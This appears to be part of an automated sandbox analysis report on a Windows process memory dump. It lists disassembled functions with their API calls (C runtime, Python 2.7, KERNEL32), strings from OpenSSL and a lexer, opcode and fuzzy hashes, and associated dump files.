..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA09B2

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: CertErrorLastOpenStore
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$Opening certificate store %s
API String ID: 942452915-209636166
Opcode ID: 237882b40536c3ec87730f1eb81f17b69a1909cdbb2e60036b5c1ff9ef18350b
Instruction ID: 3c3f66969337ae26cf762bd37b05fa9afc2750a6fd0bbc0a1e7c96dbb664782c
Opcode Fuzzy Hash: 237882b40536c3ec87730f1eb81f17b69a1909cdbb2e60036b5c1ff9ef18350b
Instruction Fuzzy Hash: 7FF0AF72F807213BEA316A647C59F2B27096B50B95F050511BD48FBB40D6D0AD20CAD6

Uniqueness

Uniqueness Score: -1.00%

Function 02C34120, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02C3412C

Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33CAB
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33CDA
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33CF5
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33D0A
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33D25
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33D38
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33D61
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33DEE
Part of subcall function 02C33C90: printf.MSVCR90 ref: 02C33E03

printf.MSVCR90 ref: 02C34140

Strings

-------------------------------------------------------, xrefs: 02C3413B
-------------------------------------------------------, xrefs: 02C34127

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: -------------------------------------------------------$-------------------------------------------------------
API String ID: 3524737521-1924146118
Opcode ID: 821f8330802ec0ee5940ae9873df48a02010bbd0d8334ec58642fd6e88345f9a
Instruction ID: 5e6e33dd6b618aee03e4f527cca94ef0734cd3175bf48c949e623c568a274e3d
Opcode Fuzzy Hash: 821f8330802ec0ee5940ae9873df48a02010bbd0d8334ec58642fd6e88345f9a
Instruction Fuzzy Hash: C0C01231E542245BD604E798BC41C4637589E495107014547A50653340C970EC448FE2

Uniqueness

Uniqueness Score: -1.00%

Function 02C3D292, Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 396COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02C3D302

Strings

, xrefs: 02C3D318
wrong usage of identifier "%s", xrefs: 02C3D2F1

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintf
String ID: $wrong usage of identifier "%s"
API String ID: 3512837008-157174781
Opcode ID: ed28918c8b5cb32069bae69d9bf4231bd30f18ab34fd6c09ccb6e456d769820f
Instruction ID: 1c5ad5deaa7751facb040b28ad40d7ee2d8fd1533d4f0d21394eaf7fbf8b3d0a
Opcode Fuzzy Hash: ed28918c8b5cb32069bae69d9bf4231bd30f18ab34fd6c09ccb6e456d769820f
Instruction Fuzzy Hash: 070236B0A083419FC315CF18C484A6ABBE5FFC8304F148E1EE5898B261E774DA56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C41AF0, Relevance: 6.3, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

free.MSVCR90(?,?,?,?,?,?,?,?), ref: 02C41B23
free.MSVCR90(?,?,?,?,?,02C41C00,?,?,?,?,?,?,?,?,?), ref: 02C41B29
free.MSVCR90(?,?,?,?,?,02C41C00,?,?,?,?,?,?,?,?,?), ref: 02C41B43
free.MSVCR90(?,?,?,02C41C00,?,?,?,?,?,?,?,?,?), ref: 02C41B4C
free.MSVCR90(?,?,?,02C41C00,?,?,?,?,?,?,?,?,?), ref: 02C41B70

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4c783000fa5908bea6ca3d5084baf39a39097b55a7f5fe6615388f10717c96aa
Instruction ID: 4f881d1748d780a31827db3e39654249e5bc3caa1b3406b8f8ce9a65862bb8bf
Opcode Fuzzy Hash: 4c783000fa5908bea6ca3d5084baf39a39097b55a7f5fe6615388f10717c96aa
Instruction Fuzzy Hash: 7011D2B2901B049FC320DF6AD9C0827F7F5FF896543858A2ED59A83A00DB70F558CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C49B80, Relevance: 6.3, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

free.MSVCR90(?,?,?), ref: 02C49BB3
free.MSVCR90(?,?,?,?,?,02C4A05C,?,?,?,?,?,?), ref: 02C49BB9
free.MSVCR90(?,?,?,?,?,02C4A05C,?,?,?,?,?,?), ref: 02C49BD3
free.MSVCR90(?,?,?,02C4A05C,?,?,?,?,?,?), ref: 02C49BDC
free.MSVCR90(?,?,?,02C4A05C,?,?,?,?,?,?), ref: 02C49C00

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b9c44722599db6201ee4c8415f3b4789058aa80c128b019a8701fa54d0417283
Instruction ID: f50b36084f780fd7e192e2ba5df7ff6cb8433ae392d09b7dcccd27c1ab083efd
Opcode Fuzzy Hash: b9c44722599db6201ee4c8415f3b4789058aa80c128b019a8701fa54d0417283
Instruction Fuzzy Hash: 6A11D2B2901B149FC330DF6AD9C1827F7F5FB89610381892ED59A83A00CB31F658CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C406D0, Relevance: 6.3, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

free.MSVCR90(?,?,?), ref: 02C40703
free.MSVCR90(?,?,?,?,?,02C40BB6,?,?,00000000,?,?,?), ref: 02C40709
free.MSVCR90(?,?,?,?,?,02C40BB6,?,?,00000000,?,?,?), ref: 02C40723
free.MSVCR90(?,?,?,02C40BB6,?,?,00000000,?,?,?), ref: 02C4072C
free.MSVCR90(00000000,?,?,02C40BB6,?,?,00000000,?,?,?), ref: 02C40750

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b9c44722599db6201ee4c8415f3b4789058aa80c128b019a8701fa54d0417283
Instruction ID: 88c56557a80c663b47368555e5c1d8a0f7616be037619f5e9bbb9fb545202122
Opcode Fuzzy Hash: b9c44722599db6201ee4c8415f3b4789058aa80c128b019a8701fa54d0417283
Instruction Fuzzy Hash: 931104B1900B049FC320DF5AD9C0827F7F5FB89610380892ED68A83A00CB30F544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C3A660, Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02C333CA), ref: 02C3A69B

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: FileSize
String ID:
API String ID: 3433856609-0
Opcode ID: 7ef66c5d8b0bacd0b9cbda7c62bca4ef91b798fbd99031797a465da115cb35c8
Instruction ID: f55fc375b5fa5d5093e303aa4f11782366c008a73cc83669482b2e68a40bf574
Opcode Fuzzy Hash: 7ef66c5d8b0bacd0b9cbda7c62bca4ef91b798fbd99031797a465da115cb35c8
Instruction Fuzzy Hash: E33161B66002009FD7109F29ECC495AB7E8FBC4625F54CE3EE599C7340D234E9558B60

Uniqueness

Uniqueness Score: -1.00%

Function 02C31386, Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02C313E7
PyString_AsString.PYTHON27(?,?), ref: 02C3140B
PyObject_IsTrue.PYTHON27(?), ref: 02C31422
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02C31450
PyString_AsString.PYTHON27(?), ref: 02C3146E
PyDict_Next.PYTHON27(?,?,?,?), ref: 02C314CC
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02C314F3

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID:
API String ID: 3898711963-0
Opcode ID: 4ff55c7c5381a657c68b002c1b4414e8d050a3a4548b2f847a2425bf2788d114
Instruction ID: 2830e9cebcbd667af2afc69b007da94eb40b94f7fe2dfd849109353c8688b4ed
Opcode Fuzzy Hash: 4ff55c7c5381a657c68b002c1b4414e8d050a3a4548b2f847a2425bf2788d114
Instruction Fuzzy Hash: 90113672504204AFC355DB68E840EAB77FCEF84294F044E1AFA4AC3210E330EA14CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 02C49A80, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCR90 ref: 02C49A8C
malloc.MSVCR90 ref: 02C49AA0
_errno.MSVCR90 ref: 02C49AAF

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: 8d05d461fdad3ccb4a041213dcf876798efd40505a879b82c2b0a33815e632f0
Instruction ID: 983f790b931b0b7c36bfe5026773f49dfd795652ff96c67beb06c66e7da12132
Opcode Fuzzy Hash: 8d05d461fdad3ccb4a041213dcf876798efd40505a879b82c2b0a33815e632f0
Instruction Fuzzy Hash: CA011EB19512308FD3909F5DE444A8ABFE9EF48B20B028597F104CB221C7B0D551CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 02C419F0, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCR90 ref: 02C419FC
malloc.MSVCR90 ref: 02C41A10
_errno.MSVCR90 ref: 02C41A1F

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: 8d05d461fdad3ccb4a041213dcf876798efd40505a879b82c2b0a33815e632f0
Instruction ID: 1c0c85ac9e0218ece249f9ba0b0c5517f1be4f3ee520a5ff4374ef62a9f44aed
Opcode Fuzzy Hash: 8d05d461fdad3ccb4a041213dcf876798efd40505a879b82c2b0a33815e632f0
Instruction Fuzzy Hash: 16011EB1A512208FD3909F5DE444A8ABFE9EF48B21B068597F104CB221C3B0D551CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 02C405D0, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCR90 ref: 02C405DC
malloc.MSVCR90 ref: 02C405F0
_errno.MSVCR90 ref: 02C405FF

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: 8d05d461fdad3ccb4a041213dcf876798efd40505a879b82c2b0a33815e632f0
Instruction ID: 6c1561dd0e3673b5efc6472ea304e20ff0bd2f2a9032c3ab623b69bc3f4454b8
Opcode Fuzzy Hash: 8d05d461fdad3ccb4a041213dcf876798efd40505a879b82c2b0a33815e632f0
Instruction Fuzzy Hash: F0011AB1A612308FD7909F5DE844A8ABFE9EF88B20B02859BF105CB221C3B0D551CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 02C32BFE, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02C32C27
PyDict_GetItemString.PYTHON27 ref: 02C32C37
PyString_AsStringAndSize.PYTHON27(00000000,?,?), ref: 02C32C5A
PyGILState_Release.PYTHON27(00000000), ref: 02C32C6B

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: State_String$Dict_EnsureItemReleaseSizeString_
String ID:
API String ID: 857863341-0
Opcode ID: 3449738d70f68ca164e7ece04515127c9668bd970cef6cae04c809c464f7558e
Instruction ID: 2f94e15be3fa671dbf7ba9c918ee7f3ba39bea37b9178505faca480e2d1a820d
Opcode Fuzzy Hash: 3449738d70f68ca164e7ece04515127c9668bd970cef6cae04c809c464f7558e
Instruction Fuzzy Hash: D2F081766002005FE714CB64EC89AA6B7A4FFC4215B444D2AED5982200E721EA6CCA56

Uniqueness

Uniqueness Score: -1.00%

Function 02C40800, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02C4080A
malloc.MSVCR90 ref: 02C4082F

Part of subcall function 02C40370: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02C40380

Strings

out of dynamic memory in yy_create_buffer(), xrefs: 02C40819
out of dynamic memory in yy_create_buffer(), xrefs: 02C4083F

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: malloc$longjmp
String ID: out of dynamic memory in yy_create_buffer()$out of dynamic memory in yy_create_buffer()
API String ID: 2248186240-2516649376
Opcode ID: 119b7a4b4cfba40d289740d45cc98622c4c585fb491454bbd105bc3891c41c2f
Instruction ID: 46c840d3b3f65aa4223526c591c5991165552145c58a5860eec79110417ed74a
Opcode Fuzzy Hash: 119b7a4b4cfba40d289740d45cc98622c4c585fb491454bbd105bc3891c41c2f
Instruction Fuzzy Hash: FEF096B1A843015BD220DB98AD01A0BB7D89F80B54F008829F545D7300DA74ED048BE2

Uniqueness

Uniqueness Score: -1.00%

Function 02C31690, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

PyObject_Malloc.PYTHON27(?,02D45188), ref: 02C316A1
PyObject_Init.PYTHON27(00000000), ref: 02C316AB
PyString_FromString.PYTHON27(?), ref: 02C316BF
PyString_FromString.PYTHON27(?), ref: 02C316CD

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: FromObject_StringString_$InitMalloc
String ID:
API String ID: 3199475769-0
Opcode ID: a09d478196b00f85c17e4b7073b569ff77b355c0b70d05f9356addad3d801cb2
Instruction ID: e6cbedba0a738ddd59a6a3290a6efc147cdb5bd4bbfced3b70aba086ffebca2a
Opcode Fuzzy Hash: a09d478196b00f85c17e4b7073b569ff77b355c0b70d05f9356addad3d801cb2
Instruction Fuzzy Hash: 8FF04971A40704AFC320CFA9E848556B7F4FF48756B044E2EEA4E83300D734A628CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 02C31695, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

PyObject_Malloc.PYTHON27(?,02D45188), ref: 02C316A1
PyObject_Init.PYTHON27(00000000), ref: 02C316AB
PyString_FromString.PYTHON27(?), ref: 02C316BF
PyString_FromString.PYTHON27(?), ref: 02C316CD

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: FromObject_StringString_$InitMalloc
String ID:
API String ID: 3199475769-0
Opcode ID: 67c42d311e778b98731e079318d9e1470bcbf1690061f42b566578a2a4f1d0c7
Instruction ID: 4852b1ac6f4691c17ad05259a814aaffe0297de377bd7ced6ce73e2ae2803a4e
Opcode Fuzzy Hash: 67c42d311e778b98731e079318d9e1470bcbf1690061f42b566578a2a4f1d0c7
Instruction Fuzzy Hash: C0F06D70A407049FC320CFA9A848556B7F4FF44756B044E2EE94E83300D734A628CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02CA5490, Relevance: 5.4, APIs: 4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c48b143b426f197fdca3677fa6746cf9473b0f5bed0f8a23c6b97ecacd2dc720
Instruction ID: 60d0de4e7d85d23b151effef71283d6f1bebc313f0a76887a6bef7d7cbecacda
Opcode Fuzzy Hash: c48b143b426f197fdca3677fa6746cf9473b0f5bed0f8a23c6b97ecacd2dc720
Instruction Fuzzy Hash: 87D17AB1A04201AFD714DE68CC94E7BB7EEEFC8748F448A1CF94587244E675E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02C9FD50, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,00000000,?,02CA0798,00000000,?,0000000B,00000000), ref: 02C9FD84

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C9FDA8, 02C9FDC6, 02C9FDF2, 02C9FE26, 02C9FE36

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
